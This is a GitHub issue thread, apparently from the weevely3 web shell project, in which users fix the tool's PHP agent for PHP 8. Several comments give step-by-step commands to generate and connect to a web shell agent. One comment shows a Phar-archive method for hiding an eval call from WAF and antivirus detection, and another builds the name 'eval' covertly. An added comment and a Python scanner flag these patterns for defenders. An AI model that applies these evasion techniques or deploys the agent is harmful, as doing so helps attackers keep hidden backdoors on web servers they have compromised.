
Comments (11)

LachlanArthur avatar LachlanArthur commented on August 16, 2024 9

To generate an agent that works with PHP 8+:

Run the generate command with the flag -obfuscator cleartext1_php to disable the agent obfuscation (this is the only place that create_function is used).

Change a line in the agent to swap curly braces to square ones:

  ...
  for($i=0;$i<$l;){
  for($j=0;($j<$c&&$i<$l);$j++,$i++)
  {
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
  }
  }
  ...
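Review bot: the one-line change is correct for PHP 8 (the curly-brace string offset `$t{$i}` was deprecated in 7.4 and removed in 8.0, and `$t[$i]` is equivalent on 7.x as well), but it only patches the generated cleartext1_php agent; a later comment in this thread says obfpost_php.tpl needs the same kind of fix, so the templates should be searched for every `$var{` offset rather than editing the single generated file by hand.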

from weevely3.

archidote avatar archidote commented on August 16, 2024 5

Hello @nickylivardo,

Thanks for your answer! It successfully works!

Below is a step-by-step tutorial:

weevely generate -obfuscator cleartext1_php 123 file.php

nano file.php

  ...
  for($i=0;$i<$l;){
  for($j=0;($j<$c&&$i<$l);$j++,$i++)
  {
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
  }
  }
  ...

weevely http://localhost/file.php 123


++

Archidote

from weevely3.

PawelklosPL avatar PawelklosPL commented on August 16, 2024 4

@archidote @nickylivardo, thanks for the answer.
For future generations:

This problem still exists in
Weevely: 4.0.1
PHP Version: 8.2.2
System: Kali linux

from weevely3.

ZanyMonk avatar ZanyMonk commented on August 16, 2024 2

The obfpost_php.tpl template is pretty easy to fix, as shown above.

But I feel like there is no alternative to the now defunct create_function: the only alternative would be eval, but the purpose of this obfuscator is to hide the eval call from an eventual WAF/AV in the first place, so using this function to start the deobfuscation process seems odd, if not useless.

We cannot call it from a string (i.e. $f = "ev"."al"; $f("...");) because eval is a language construct, not a function.

Does anyone have an idea to save this obfuscator from obsolescence?

Edit: assert could have been a good candidate but it does not evaluate string arguments since 8.0.0, so it's not usable.

Edit 2: it may be possible to use a (compressed) Phar archive to mangle the eval call.
Phar support is enabled by default according to PHP documentation.
It works with allow_url_include = Off.

<?php
$a = new Phar('x.phar');
$a->startBuffering();
$a->addFromString('index.php', "<?php\neval('system(\"id\");');"); // This gets compressed
$a->setStub('<?php
include "phar://".basename(__FILE__)."/index.php";
__HALT_COMPILER();
');
$a->stopBuffering();
$a->compressFiles(Phar::GZ);
Result
00000000: 3c3f 7068 700a 696e 636c 7564 6520 2270  <?php.include "p
00000010: 6861 723a 2f2f 222e 6261 7365 6e61 6d65  har://".basename
00000020: 285f 5f46 494c 455f 5f29 2e22 2f69 6e64  (__FILE__)."/ind
00000030: 6578 2e70 6870 223b 0a5f 5f48 414c 545f  ex.php";.__HALT_
00000040: 434f 4d50 494c 4552 2829 3b20 3f3e 0d0a  COMPILER(); ?>..
00000050: 5400 0000 0200 0000 1100 0010 0100 0000  T...............
00000060: 0000 0000 0000 0900 0000 696e 6465 782e  ..........index.
00000070: 7068 701c 0000 002e 4a84 641e 0000 0008  php.....J.d.....
00000080: e929 0db4 1100 0000 0000 0001 0000 0078  .).............x
00000090: 1c00 0000 2e4a 8464 1f00 0000 cc69 d406  .....J.d.....i..
000000a0: b411 0000 0000 0000 b3b1 2fc8 2850 482d  ........../.(PH-
000000b0: 4bcc d150 2fae 2c2e 49cd d550 ca4c 51d2  K..P/.,.I..P.LQ.
000000c0: b456 d7b4 0600 dbbc 51ff 84c6 032f 5def  .V......Q..../].
000000d0: 3317 03f4 d7e9 e879 9ebd 1a70 ca27 f0d2  3......y...p.'..
000000e0: 96b0 eb5b 0072 0202 e90d 9891 bf8f de1a  ...[.r..........
000000f0: dbfa 64d0 14a6 fb5d e8eb dd94 c21f 040f  ..d....]........
00000100: 4abf 877e 9303 0000 0047 424d 42         J..~.....GBMB

I created a PR to fix the agent and add a phar obfuscator.

from weevely3.

lazypip avatar lazypip commented on August 16, 2024

I got the same problem, but only with PHP 8. So I think there may be several measures applied in the newest PHP version.

from weevely3.

epinna avatar epinna commented on August 16, 2024

I confirm that PHP 8 removed create_function, breaking the PHP agent.

from weevely3.

Ghazavizade avatar Ghazavizade commented on August 16, 2024

Hi there
I tried it on the latest version of Kali and PHP 7.3 but I still have this problem; fortunately the shell works completely fine, the problem is that this error is so annoying.
Why does this happen exactly?
Is there any quick fix or complete fix for this issue?

from weevely3.

0bskure avatar 0bskure commented on August 16, 2024

I confirm that PHP 8 removed create_function, breaking the PHP agent.

call_user_func still exists and works generally the same as create_function did

on an unrelated note, the function names in the php agent can be generated dynamically while still somewhat obfuscated by building them with static values returned by php functions such as the array keys for get_defined_constants

example with eval

```php
<?php
// this should return 'eval' on most php versions,

$func = strtolower(array_keys(get_defined_constants())[1]);
print($func[0].$func[6].$func[9].$func[11]);
```

there are enough static values located in the same indexes returned from get_defined_constants across most php versions to extend further with other function names

from weevely3.
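The tricks collected in this thread (the removed create_function call, the curly-brace string offset that breaks the agent on PHP 8, the self-including Phar stub, and the function name assembled from get_defined_constants() keys) are all visible in source, so a defender can flag them statically. The scanner below is an added example in Python and is not code from weevely3 or from anyone in this issue; the indicator names, the regexes and the sample PHP snippets are my own constructions, and the samples are not taken from any real host.

```python
"""Static indicators for the PHP 8 breakages and obfuscation tricks discussed
in this thread. Added example, not weevely3 code; the sample files at the
bottom are constructed for illustration, not taken from any real host."""
import re

# indicator name -> (regex, fatal on PHP 8?)
INDICATORS = {
    # Removed in PHP 8.0; calling it is a fatal error (the symptom reported above).
    "create_function": (re.compile(r"\bcreate_function\s*\("), True),
    # Curly-brace string offset such as $t{$i}: deprecated in 7.4, removed in 8.0.
    "curly_string_offset": (re.compile(r"\$[A-Za-z_]\w*\{"), True),
    # A plain eval() call, the thing the obfuscators in this thread try to hide.
    "eval": (re.compile(r"\beval\s*\("), False),
    # The two halves of the self-including Phar stub shown above.
    "phar_wrapper": (re.compile(r"phar://"), False),
    "halt_compiler": (re.compile(r"__HALT_COMPILER\s*\("), False),
    # A name built from the keys of get_defined_constants(), indexed by position.
    "constants_name_building": (
        re.compile(r"get_defined_constants\s*\(\s*\)\s*\)\s*\["), False),
    # Single characters picked out of a string by index and concatenated.
    "char_index_concat": (
        re.compile(r"\$\w+\[\d+\]\s*\.\s*\$\w+\[\d+\]"), False),
}


def scan_php_source(src):
    """Return {indicator: [1-based line numbers]} for every indicator that fires."""
    hits = {}
    for lineno, line in enumerate(src.splitlines(), start=1):
        for name, (pattern, _fatal) in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def php8_breakers(hits):
    """Indicators that will fatally error on a PHP 8 host: a porting checklist."""
    return sorted(name for name in hits if INDICATORS[name][1])


def looks_like_phar_stub(hits):
    """The Phar trick needs both the phar:// include and the __HALT_COMPILER marker."""
    return "phar_wrapper" in hits and "halt_compiler" in hits


# Constructed samples: the unpatched agent loop, the Phar stub from above,
# the constant-index name trick, and a clean PHP 8 style XOR loop.
AGENT_LOOP = "for($j=0;($j<$c&&$i<$l);$j++,$i++)\n{\n$o.=$t{$i}^$k{$j};\n}\n"
PHAR_STUB = ('<?php\ninclude "phar://".basename(__FILE__)."/index.php";\n'
             "__HALT_COMPILER();\n")
CONST_TRICK = ("<?php\n$func = strtolower(array_keys(get_defined_constants())[1]);\n"
               "print($func[0].$func[6].$func[9].$func[11]);\n")
CLEAN = ("<?php\nfunction xor_dec($t,$k){ $o=''; for($i=0;$i<strlen($t);$i++)"
         "{ $o.=$t[$i]^$k[$i%strlen($k)]; } return $o; }\n")

if __name__ == "__main__":
    for label, src in [("agent", AGENT_LOOP), ("phar", PHAR_STUB),
                       ("const", CONST_TRICK), ("clean", CLEAN)]:
        hits = scan_php_source(src)
        print(label, hits, "php8 breakers:", php8_breakers(hits),
              "phar stub:", looks_like_phar_stub(hits))
```

The line-by-line regexes are deliberately crude: they are meant to triage uploaded or modified PHP files in a web root, not to parse PHP, so a hit is a reason to read the file, and the `php8_breakers` list doubles as the checklist an operator needs when a PHP 7 deployment is upgraded and scripts start dying with the fatal error reported in this issue.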

epinna avatar epinna commented on August 16, 2024

The purpose of create_function was to execute in-memory PHP code from a dynamic string without leaving visible eval()s in the code. From a quick glance, it does not seem to be possible to do the same with call_user_func.

from weevely3.

archidote avatar archidote commented on August 16, 2024

I got the same error as you all. :/

from weevely3.

nickylivardo avatar nickylivardo commented on August 16, 2024

To generate an agent that works with PHP 8+:

Run the generate command with the flag -obfuscator cleartext1_php to disable the agent obfuscation (this is the only place that create_function is used).

Change a line in the agent to swap curly braces to square ones:

  ...
  for($i=0;$i<$l;){
  for($j=0;($j<$c&&$i<$l);$j++,$i++)
  {
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
  }
  }
  ...

it works, thanks

from weevely3.
